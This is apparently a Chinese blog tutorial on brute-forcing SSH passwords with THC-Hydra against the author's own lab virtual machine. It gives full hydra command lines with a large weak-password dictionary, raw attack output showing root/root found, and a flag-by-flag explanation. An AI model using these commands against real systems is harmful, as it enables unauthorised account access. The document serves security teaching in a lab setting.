这里我搭了台虚拟机。ssh开放的22端口。用户名密码都是root。

下载windows版本的hydra

GitHub - maaaaz/thc-hydra-windows at v9.1

解压就可以了

这里要自己下载一个字典，也就是这样的。这里面有很多字符串，代表密码，到时候这个软件会一个一个试。

用cmd进如目录：

D:\hackSoftware\thc-hydra-windows-v9.1>hydra -l root -o 1.txt -f -P D:\hackSoftware\字典\kali1400万弱口令\dict.txt ssh://192.168.229.226:22222

运行：

D:\hackSoftware\thc-hydra-windows-v9.1>hydra -l root -o 1.txt -f -P D:\hackSoftware\字典\kali1400万弱口令\dict.txt ssh://192.168.229.226:22222
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-03-17 15:32:42
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://192.168.229.226:22/
[STATUS] 177.00 tries/min, 177 tries in 00:01h, 14344223 to do in 1350:41h, 16 active
[STATUS] 136.33 tries/min, 409 tries in 00:03h, 14343991 to do in 1753:33h, 16 active
[STATUS] 116.71 tries/min, 817 tries in 00:07h, 14343583 to do in 2048:15h, 16 active
[STATUS] 118.33 tries/min, 1775 tries in 00:15h, 14342625 to do in 2020:06h, 16 active
[STATUS] 113.84 tries/min, 3529 tries in 00:31h, 14340871 to do in 2099:36h, 16 active

 我们换个字典少的：

D:\hackSoftware\thc-hydra-windows-v9.1>hydra -l root -o 1.txt -f -P D:\hackSoftware\字典\kali1400万弱口令\test.txt ssh://192.168.229.226:22
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-03-17 16:09:51
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 1 task per 1 server, overall 1 task, 1 login try (l:1/p:1), ~1 try per task
[DATA] attacking ssh://192.168.229.226:22/
[22][ssh] host: 192.168.229.226   login: root   password: root
[STATUS] attack finished for 192.168.229.226 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-03-17 16:10:07

D:\hackSoftware\thc-hydra-windows-v9.1>

这样就成功暴力破解了。用户名密码都是root。

下面来详细看下其参数：

运行如下：

D:\hackSoftware\thc-hydra-windows-v9.1>hydra
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-c TIME] [-ISOuvVd46] [-m MODULE_OPT] [service://server[:PORT][/OPT]]

Options:
  -l LOGIN or -L FILE  login with LOGIN name, or load several logins from FILE
  -p PASS  or -P FILE  try password PASS, or load several passwords from FILE
  -C FILE   colon separated "login:pass" format, instead of -L/-P options
  -M FILE   list of servers to attack, one entry per line, ':' to specify port
  -t TASKS  run TASKS number of connects in parallel per target (default: 16)
  -U        service module usage details
  -m OPT    options specific for a module, see -U output for information
  -h        more command line options (COMPLETE HELP)
  server    the target: DNS, IP or 192.168.0.0/24 (this OR the -M option)
  service   the service to crack (see below for supported protocols)
  OPT       some service modules support additional input (-U for module help)

Supported services: adam6500 asterisk cisco cisco-enable cvs ftp[s] http[s]-{head|get|post} http[s]-{get|post}-form http-proxy http-proxy-urlenum icq imap[s] irc ldap2[s] ldap3[-{cram|digest}md5][s] mssql mysql nntp oracle-listener oracle-sid pcanywhere pcnfs pop3[s] postgres radmin2 rdp redis rexec rlogin rpcap rsh rtsp s7-300 sip smb smtp[s] smtp-enum snmp socks5 ssh sshkey teamspeak telnet[s] vmauthd vnc xmpp

Hydra is a tool to guess/crack valid login/password pairs.
Licensed under AGPL v3.0. The newest version is always available at;
https://github.com/vanhauser-thc/thc-hydra
Please don't use in military or secret service organizations, or for illegal
purposes. (This is a wish and non-binding - most such people do not care about
laws and ethics anyway - and tell themselves they are one of the good ones.)

Example:  hydra -l user -P passlist.txt ftp://192.168.0.1

D:\hackSoftware\thc-hydra-windows-v9.1>

总结下吧：此工具请不要用于非法用途。

使用例子如下：

hydra -l user -P passlist.txt ftp://192.168.0.1

hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-c TIME] [-ISOuvVd46] [-m MODULE_OPT] [service://server[:PORT][/OPT]]

-l login or -L File	login是用户名，-L是提供用户名文件，里面可以放多个用户名
-p PASS or -P File	PASS是一个密码，File是提供密码文件，也就是字典
-C File	冒号分割的形式 “用户名:密码”，这个格式代替 -L/-P参数
-M File	列出需要攻击的服务，一行一条，“:”后面放端口号
-t Tasks	并发数，也就是线程，默认是16个
-U	服务模块使用详情
-m OPT	选择特定的模块，-U查看输出详情
-h	帮助
server	目标服务名：如：DNS、IP、网段
service	破解服务
OPT	一些服务模块支持额外输入
-o	输出文件
-f	破解成功（一次）后就退出

目前简单介绍到这里，下面来看下命令：

hydra -l root -o 1.txt -f -P dict.txt ssh://192.168.229.226:22

用户名为root

破解数据输出到1.txt文件中

破解弱口令后就退出了

字典文件为dict.txt

破解ssh协议，ip地址为192.168.229.226端口号为22